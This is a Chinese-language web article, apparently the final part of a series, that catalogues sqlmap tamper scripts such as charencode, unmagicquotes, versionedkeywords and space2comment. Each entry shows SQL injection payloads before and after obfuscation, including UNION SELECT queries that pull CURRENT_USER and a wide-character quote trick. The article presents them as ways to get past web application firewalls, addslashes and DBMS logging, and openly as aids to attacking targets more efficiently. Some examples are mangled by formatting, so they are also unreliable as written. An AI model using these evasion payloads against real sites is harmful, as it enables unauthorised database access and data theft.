Sqlmap Tamper大全（3）

浏览： ℃

字体：大中小

发布时间：2013-12-17 09:37:14

来源：

sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MS- SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术，分别是盲推理SQL注入，UNION查询SQL 注入，堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹，枚举，数据库提取，访问目标文件系统，并在获取完全操作权限时实行任意命令。在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击。
本文是Sqlmap Tamper大全的最后一章，想阅读前两章的同学，可以点这里： http://www.vm888.com/Article/201312/263564.html
脚本名：sp_password.py
作用：追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
Example:

('1 AND 9227=9227-- ')'1 AND 9227=9227-- sp_password'

Requirement:
* MSSQL
———————————————————————————
脚本名：chardoubleencode.py 双url编码(不处理以编码的)
Example:

* Input: SELECT FIELD FROM%20TABLE* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

脚本名：unionalltounion.py
作用：替换UNION ALL SELECT UNION SELECT
Example:

('-1 UNION ALL SELECT')'-1 UNION SELECT'

Requirement:
all
——————————————————————————-
脚本名：charencode.py
作用：url编码
Example:

* Input: SELECT FIELD FROM%20TABLE* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
· Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
· The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS
————————————————————
脚本名：randomcase.py
作用：随机大小写
Example:

	`* Input: INSERT`
	`* Output: InsERt`

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
———————————————————————-
脚本名：unmagicquotes.py
作用：宽字符绕过 GPC addslashes
Example:

	`* Input: 1′ AND 1=1`
	`* Output: 1%bf%27 AND 1=1–%20`

Notes:
· Useful for bypassing magic_quotes/addslashes feature
——————————————————————————–
脚本名：randomcomments.py
作用：用/**/分割sql关键字
Example:

‘INSERT’ becomes ‘IN//S//ERT’

————————————————————————
脚本名：versionedkeywords.py
作用：Encloses each non-function keyword with versioned MySQL comment
Example:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement:
* MySQL
—————————————————————————-
脚本名：charunicodeencode.py
作用：字符串 unicode 编码
Example:

* Input: SELECT FIELD%20FROM TABLE* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:
* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
· Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
—————————————————————————-
脚本名：securesphere.py
作用：追加特制的字符串
Example:

	`('1 AND 1=1')`
	`"1 AND 1=1 and '0having'='0having'"`

Tested against:
all
—————————————————————————-
脚本名：versionedmorekeywords.py
作用：注释绕过
Example:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:

* MySQL >= 5.1.13
—————————————————————————-
脚本名：space2comment.py
作用：Replaces space character (‘ ‘) with comments ‘/**/’
Example:

	`* Input: SELECT id FROM users`
	`* Output: SELECT//id//FROM/**/users`

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
· Useful to bypass weak and bespoke web application firewalls
—————————————————————————-
脚本名：halfversionedmorekeywords.py
作用：关键字前加注释
Example:

		`* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa`
	`* Output: value’/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58)), NULL, NULL#/!0AND ‘QDWa’='QDWa`